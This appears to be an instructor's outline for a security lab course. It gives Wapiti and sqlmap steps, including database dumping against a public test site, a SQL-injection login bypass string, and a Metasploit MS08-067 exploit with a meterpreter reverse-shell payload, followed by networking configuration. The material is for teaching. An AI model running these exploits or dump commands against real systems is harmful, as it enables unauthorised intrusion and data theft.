Beginner's Course in System Security & Digital Forensics
Hello Everyone, I am Assistant Professor Mr. Sridhar Iyer, working with the University of Mumbai for the last 7 years. I always believe in “Sharing Knowledge”.
I am rolling out a series of Video Tutorial Hands-On sessions on upcoming technologies and academic subjects based on my expertise and comfort.
I am beginning with lab sessions on a fairly new subject “Advanced System Security and Digital Forensics”. I am a Certified Ethical Hacker by E.C. Council USA and have my core expertise in Cryptography and System Security.
I believe in sharing whatever knowledge and experience I have gained so far in my short but sweet stint as a Teacher.
I hope this series of lectures and lab sessions helps you learn something useful and interesting.
-
6. Wapiti Part 1 (Video lesson)
Aim: Explore web application vulnerabilities using Wapiti.
Wapiti allows you to audit the security of your websites or web applications. It performs "black-box" scans (it does not study the source code) of the web application by crawling the web pages of the deployed web app, looking for scripts and forms where it can inject data. Once it gets the list of URLs, forms and their inputs, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.
-
7. Wapiti Part 2 (Video lesson)
Steps
1. Open Anaconda Prompt
2. pip install wapiti3
3. wapiti --list
4. wapiti -u http://testphp.vulnweb.com/
-
8. SQLMap Part 1 (Video lesson)
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application's database server. The vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.
Example: "SELECT name FROM user where username = '" + username + "' and password = '" + password + "'";
Normal scenario: "SELECT name FROM user where username = '" + username + "' and password = '" + password + "'";
Vulnerable scenario (password entered as unknown' or '1'='1): "SELECT name FROM user where username = '" + username + "' and password = 'unknown' or '1'='1'";
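The normal and vulnerable scenarios above, as an added example that is not part of the original course material: a Python sketch using the standard-library sqlite3 module that runs the concatenated query beside a parameterized version of it. The one-row user table, the function names and the sample credentials are constructed for illustration.

```python
import sqlite3


def make_db():
    """Build an in-memory 'user' table matching the page's query (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (name TEXT, username TEXT, password TEXT)")
    # Plaintext password only to mirror the page's query; real systems store hashes.
    db.execute("INSERT INTO user VALUES ('Alice Example', 'alice', 's3cret')")
    db.commit()
    return db


def login_concatenated(db, username, password):
    """The page's query: input is pasted into the SQL text, so a quote
    character in the input ends the string literal and the rest is parsed as SQL."""
    query = ("SELECT name FROM user where username = '" + username +
             "' and password = '" + password + "'")
    return [row[0] for row in db.execute(query)]


def login_parameterized(db, username, password):
    """Same query with placeholders: the driver binds the input as data,
    so it is compared as a literal string and never parsed as SQL."""
    query = "SELECT name FROM user where username = ? and password = ?"
    return [row[0] for row in db.execute(query, (username, password))]


if __name__ == "__main__":
    db = make_db()
    crafted = "unknown' or '1'='1"  # the password value from the vulnerable scenario
    cases = [("correct password", "s3cret"), ("crafted password", crafted)]
    for label, password in cases:
        print(label)
        print("  concatenated :", login_concatenated(db, "alice", password))
        print("  parameterized:", login_parameterized(db, "alice", password))
```

With the crafted value the concatenated query's WHERE clause becomes always true because AND binds tighter than OR, so every row is returned even for an unknown username; the parameterized query returns no rows.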
-
9. SQLMap Part 2 (Video lesson)
Steps
1. $ sudo apt-get install sqlmap (for Linux)
2. $ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
3. $ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D "databaseName" --tables
4. $ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D "databaseName" -T "TableName" --columns
5. $ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D "databaseName" -T "TableName" -C "ColumnName" --dump
-
10. SQLiLABS (Video lesson)
-
11. Metasploit Part 1 (Video lesson)
In this section we'll walk you through the act of exploiting a live install of Windows XP Service Pack 3. We'll make use of the well-known vulnerability in netapi32.dll in the Windows operating system.
The vulnerability is in fact very dangerous because the attacker is not required to authenticate to the target machine prior to running the attack.
-
12. Metasploit Part 2 (Video lesson)
Steps
1. Choosing and configuring an exploit
(code that enters a target system by taking advantage of one of its bugs)
2. Choosing and configuring a payload
(code that will be executed on the target system upon successful entry)
3. Executing the exploit.
COMMANDS:
1. service postgresql start
2. msfconsole
3. show exploits
4. use windows/smb/ms08_067_netapi
5. show options
6. set RHOST "Victim's IP"
7. set payload windows/meterpreter/reverse_tcp
8. set LHOST "Your IP"
9. exploit
10. "Yippee! You are inside the victim's machine"
pwd, mkdir, cat
-
13. Introduction to Packet Sniffing (Video lesson)
-
14. Packet Sniffing Using Wireshark (Video lesson)
-
15. Introduction to ARP Spoofing (Video lesson)
-
16. ARP Spoofing/Poisoning using Ettercap (Video lesson)
-
17. Part 1: Routing Information Protocol (RIP) (Video lesson)
Steps:
1. Create the network in CPT as per the diagram.
2. Apply Routing Information Protocol (RIP)
3. Create Access Control Lists (ACL)
4. Create a Virtual LAN (VLAN).
-
18. Part 2: Access Control Lists (ACL) (Video lesson)
Steps:
1. Create the network in CPT as per the diagram.
2. Apply Routing Information Protocol (RIP)
3. Create Access Control Lists (ACL)
4. Create a Virtual LAN (VLAN).
ACCESS LISTS:
1. Standard Access List (1-99): applied closest to the destination
2. Extended Access List (100-199): applied closest to the source
-
19. Part 3: Virtual LAN (VLAN) (Video lesson)
1. Create 3 VLANs (VLAN 10, VLAN 20, VLAN 30)
2. Switch 2 - Vlan 20
name sales
exit
Vlan 30
name sales
exit
int fa0/1
switchport access vlan 20
exit
int fa0/2
switchport access vlan 20
exit
int fa0/3
switchport access vlan 30
exit
int fa0/4
switchport access vlan 30
exit